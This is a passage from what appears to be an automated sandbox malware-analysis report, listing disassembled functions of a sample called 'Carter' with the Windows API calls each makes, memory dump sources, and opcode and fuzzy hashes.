                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: cae6e3e9e96a906a2d260061fd238bb37cd5c9574a2c2b539a9b3175b3c07c9a
                                                                        • Instruction ID: 317156d0cdfbd2554fac547781a08a9effd169a3875e221f20f2496f84a3dc18
                                                                        • Opcode Fuzzy Hash: cae6e3e9e96a906a2d260061fd238bb37cd5c9574a2c2b539a9b3175b3c07c9a
                                                                        • Instruction Fuzzy Hash: A031AE30640309EEEF659B58CC54BAC3BEAAB0A320F54C543FBD5E61A1CB76A6508751
                                                                        Function 0106B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ClientToScreen.USER32(?,?), ref: 0106B1D2
                                                                        • GetWindowRect.USER32(?,?), ref: 0106B248
                                                                        • PtInRect.USER32(?,?,0106C6BC), ref: 0106B258
                                                                        • MessageBeep.USER32(00000000), ref: 0106B2C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        • Opcode ID: a99f0383b96095581b4db980469bb5f92e128b11dd393298591d06021d069b01
                                                                        • Instruction ID: f6fcebafa39579fd1bc43fe8f3fc69d1e65f99d26c359f663003152013c811aa
                                                                        • Opcode Fuzzy Hash: a99f0383b96095581b4db980469bb5f92e128b11dd393298591d06021d069b01
                                                                        • Instruction Fuzzy Hash: 9841AEB0B00116DFDB21DF99C484AAD7BF9FF49710F1481A9E9A8DB259D732E441CB90
                                                                        Function 010412D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01041326
                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 01041342
                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 010413A8
                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 010413FA
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 9b1d34dc3bf8fa27dad6de583a4306f8142c50cc7b213a0464aa9cc34151c16a
                                                                        • Instruction ID: 3e0ffb616d9c06f53a449922ce0af86c4ea244650403a5fc1b5d82f21d9a0ba7
                                                                        • Opcode Fuzzy Hash: 9b1d34dc3bf8fa27dad6de583a4306f8142c50cc7b213a0464aa9cc34151c16a
                                                                        • Instruction Fuzzy Hash: DE3128F0D44208ABFB31CA298885BFE7BE5AB45312F04C37AE5D0626C5D375A9C18791
                                                                        Function 01041410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 01041465
                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 01041481
                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 010414E0
                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 01041532
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: d22017b2c111afec2309f237121f09a3431067d860216a137609d733ee0faa1b
                                                                        • Instruction ID: eaef7b22ba7b8cab22ae98ab49e49ff994c8a21208a31737eb4f7714df98e154
                                                                        • Opcode Fuzzy Hash: d22017b2c111afec2309f237121f09a3431067d860216a137609d733ee0faa1b
                                                                        • Instruction Fuzzy Hash: 89315CB0D403099FFF358A699844BFEBBE5ABC5320F08437AE5D1521C5C779A5C187A1
                                                                        Function 010163F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0101642B
                                                                        • __isleadbyte_l.LIBCMT ref: 01016459
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 01016487
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 010164BD
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: 88a3efa20591c15c83e3c88921b0f0b6d2c65a0a28442851bee10f1f1df63cc2
                                                                        • Instruction ID: 22c72faa7d8eb9e486b1f0a734a3efb2355240bd71a88c2d151cf63244f71bdb
                                                                        • Opcode Fuzzy Hash: 88a3efa20591c15c83e3c88921b0f0b6d2c65a0a28442851bee10f1f1df63cc2
                                                                        • Instruction Fuzzy Hash: D931C331640256AFEB228E69CC44BAA7FE6FF41320F1541A9E99487194DF7AE450C790
                                                                        Function 0106552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 0106553F
                                                                          • Part of subcall function 01043B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 01043B4E
                                                                          • Part of subcall function 01043B34: GetCurrentThreadId.KERNEL32 ref: 01043B55
                                                                          • Part of subcall function 01043B34: AttachThreadInput.USER32(00000000,?,010455C0), ref: 01043B5C
                                                                        • GetCaretPos.USER32(?), ref: 01065550
                                                                        • ClientToScreen.USER32(00000000,?), ref: 0106558B
                                                                        • GetForegroundWindow.USER32 ref: 01065591
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                        • String ID:
                                                                        • API String ID: 2759813231-0
                                                                        • Opcode ID: e2fc7a0c0cfb09ffcf65b512d5b061835877c97dbbbd8c496c61ab2a43d1593f
                                                                        • Instruction ID: 3a4eef4398755b7c6916897832386a97842e72c04b8790b89c3be9419eedf695
                                                                        • Opcode Fuzzy Hash: e2fc7a0c0cfb09ffcf65b512d5b061835877c97dbbbd8c496c61ab2a43d1593f
                                                                        • Instruction Fuzzy Hash: 08312C71D00248AFDB10EFA5DC859EFB7FDEF98304F10446AE855E7201EA75AE418BA1
                                                                        Function 0106CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • GetCursorPos.USER32(?), ref: 0106CB7A
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0101BCEC,?,?,?,?,?), ref: 0106CB8F
                                                                        • GetCursorPos.USER32(?), ref: 0106CBDC
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0101BCEC,?,?,?), ref: 0106CC16
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                        • String ID:
                                                                        • API String ID: 2864067406-0
                                                                        • Opcode ID: 72b369165f8a0d3194c59f08828a40073a244abdde2b8f1d6771dd2054c3a2d1
                                                                        • Instruction ID: 02b17c0da400e7018426442a5c261bcf834bf22d75215f7ca803efc1144bd8e6
                                                                        • Opcode Fuzzy Hash: 72b369165f8a0d3194c59f08828a40073a244abdde2b8f1d6771dd2054c3a2d1
                                                                        • Instruction Fuzzy Hash: B531C134600058AFEB258F59CC44EFE7FF9EB49310F444199F9C597262C3365950EBA0
                                                                        Function 01000BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __setmode.LIBCMT ref: 01000BE2
                                                                          • Part of subcall function 00FF402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01047E51,?,?,00000000), ref: 00FF4041
                                                                          • Part of subcall function 00FF402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01047E51,?,?,00000000,?,?), ref: 00FF4065
                                                                        • _fprintf.LIBCMT ref: 01000C19
                                                                        • OutputDebugStringW.KERNEL32(?), ref: 0103694C
                                                                          • Part of subcall function 01004CCA: _flsall.LIBCMT ref: 01004CE3
                                                                        • __setmode.LIBCMT ref: 01000C4E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                        • String ID:
                                                                        • API String ID: 521402451-0
                                                                        • Opcode ID: 5cdc01f04316f41d32a96884480161de518b291cb91f3d71fa485881eb0834c9
                                                                        • Instruction ID: 02c3dc6a2fa9d86fb6906f153438fd5c0105bcc13971447774dd42e7a64a2589
                                                                        • Opcode Fuzzy Hash: 5cdc01f04316f41d32a96884480161de518b291cb91f3d71fa485881eb0834c9
                                                                        • Instruction Fuzzy Hash: 0411893290020D7FEB1AB7B8AC41EFEBB6CEF51221F00406AF384971C1DF261A4257A5
                                                                        Function 01039274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01038D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01038D3F
                                                                          • Part of subcall function 01038D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01038D49
                                                                          • Part of subcall function 01038D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D58
                                                                          • Part of subcall function 01038D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D5F
                                                                          • Part of subcall function 01038D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D75
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 010392C1
                                                                        • _memcmp.LIBCMT ref: 010392E4
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0103931A
                                                                        • HeapFree.KERNEL32(00000000), ref: 01039321
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                        • String ID:
                                                                        • API String ID: 1592001646-0
                                                                        • Opcode ID: 00c0bc900d087f170baaa9e69cfd4b760e854c3655930c5563bd1503a2fca323
                                                                        • Instruction ID: 5e93512537ddbcff4d4750c627b604952bc01d676658e352a26bfa538f1afc5e
                                                                        • Opcode Fuzzy Hash: 00c0bc900d087f170baaa9e69cfd4b760e854c3655930c5563bd1503a2fca323
                                                                        • Instruction Fuzzy Hash: 92219071E40109EFDB10DFA8C944BEEBBF8EF84315F048199E495A7280D7B1AA04CB91
                                                                        Function 0106634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 010663BD
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010663D7
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010663E5
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 010663F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayered
                                                                        • String ID:
                                                                        • API String ID: 2169480361-0
                                                                        • Opcode ID: 675bfd87e6cfa59d484ac61a1bd3c0648655ea961ea8861004b3861ba27e9965
                                                                        • Instruction ID: 7c3b440aeffd50f2c1f70f05c6c2ba24dd90ee763b41cd45dc54a617e017afad
                                                                        • Opcode Fuzzy Hash: 675bfd87e6cfa59d484ac61a1bd3c0648655ea961ea8861004b3861ba27e9965
                                                                        • Instruction Fuzzy Hash: C911D631701524AFD715AB18CC44FBA779DEF85320F148218F556D72D1CBB6AD01C795
                                                                        Function 0103E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0103F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0103E46F,?,?,?,0103F262,00000000,000000EF,00000119,?,?), ref: 0103F867
                                                                          • Part of subcall function 0103F858: lstrcpyW.KERNEL32(00000000,?,?,0103E46F,?,?,?,0103F262,00000000,000000EF,00000119,?,?,00000000), ref: 0103F88D
                                                                          • Part of subcall function 0103F858: lstrcmpiW.KERNEL32(00000000,?,0103E46F,?,?,?,0103F262,00000000,000000EF,00000119,?,?), ref: 0103F8BE
                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0103F262,00000000,000000EF,00000119,?,?,00000000), ref: 0103E488
                                                                        • lstrcpyW.KERNEL32(00000000,?,?,0103F262,00000000,000000EF,00000119,?,?,00000000), ref: 0103E4AE
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0103F262,00000000,000000EF,00000119,?,?,00000000), ref: 0103E4E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                        • String ID: cdecl
                                                                        • API String ID: 4031866154-3896280584
                                                                        • Opcode ID: 190447b9850571c678da08f4c4741f1e5a7e5f59c39e7a7c1619eb7f32c4cadd
                                                                        • Instruction ID: 59194969d5622e94f6e435e8e8b3cd5dee58592bae0d4ce4228bfaa43645b238
                                                                        • Opcode Fuzzy Hash: 190447b9850571c678da08f4c4741f1e5a7e5f59c39e7a7c1619eb7f32c4cadd
                                                                        • Instruction Fuzzy Hash: 4211D336200345AFDB25AF28DC44D7A77ADFF86350B40816AF886CB294FB719940C791
                                                                        Function 01015312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 01015331
                                                                          • Part of subcall function 0100593C: __FF_MSGBANNER.LIBCMT ref: 01005953
                                                                          • Part of subcall function 0100593C: __NMSG_WRITE.LIBCMT ref: 0100595A
                                                                          • Part of subcall function 0100593C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,?,00000004,?,?,01001003,?), ref: 0100597F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: 0da758894c5a764ca65908821820af358f71b7f5773040afa5211800b394e822
                                                                        • Instruction ID: 4973823fbadeb115b47986f75f328ae04a2ef010056248ec415075ab95dc0f26
                                                                        • Opcode Fuzzy Hash: 0da758894c5a764ca65908821820af358f71b7f5773040afa5211800b394e822
                                                                        • Instruction Fuzzy Hash: 6D11E732905616AFDB763F74AC0469E3BD8BF62260F10C62BF9C89F198DA7D85408790
                                                                        Function 01056A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01047E51,?,?,00000000), ref: 00FF4041
                                                                          • Part of subcall function 00FF402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01047E51,?,?,00000000,?,?), ref: 00FF4065
                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 01056A84
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 01056A8F
                                                                        • _memmove.LIBCMT ref: 01056ABC
                                                                        • inet_ntoa.WSOCK32(?), ref: 01056AC7
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                        • String ID:
                                                                        • API String ID: 1504782959-0
                                                                        • Opcode ID: 05327d5c3a8cd9d21945208a8e33e5fa58d7144ca32ccc8deec3814c31afa770
                                                                        • Instruction ID: 13d61eb71ff8c761c551ae0072b065e86f4dea5d76080366d35cabe51dc32a7e
                                                                        • Opcode Fuzzy Hash: 05327d5c3a8cd9d21945208a8e33e5fa58d7144ca32ccc8deec3814c31afa770
                                                                        • Instruction Fuzzy Hash: BF116376900109AFCB50FBA5CD45CEEB7B8EF19310B044169FA42A72A1DF75AE04DBA1
                                                                        Function 00FE166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 00FE16B4
                                                                        • GetClientRect.USER32(?,?), ref: 0101B93C
                                                                        • GetCursorPos.USER32(?), ref: 0101B946
                                                                        • ScreenToClient.USER32(?,?), ref: 0101B951
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 4127811313-0
                                                                        • Opcode ID: 204681a2d05690ba8309f69d29e8aa56a439f5d07f55e7ee790a02852eaf7973
                                                                        • Instruction ID: 693ce7bbd67b0af46488ace82fb30eaae2c9788eefffdb665237c61a7f5c4b79
                                                                        • Opcode Fuzzy Hash: 204681a2d05690ba8309f69d29e8aa56a439f5d07f55e7ee790a02852eaf7973
                                                                        • Instruction Fuzzy Hash: F5115536A00059AFCB10EFAAC885DFE77B8FB45300F904545F981E7140C339BA51EBA1
                                                                        Function 010396F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 01039719
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0103972B
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01039741
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0103975C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
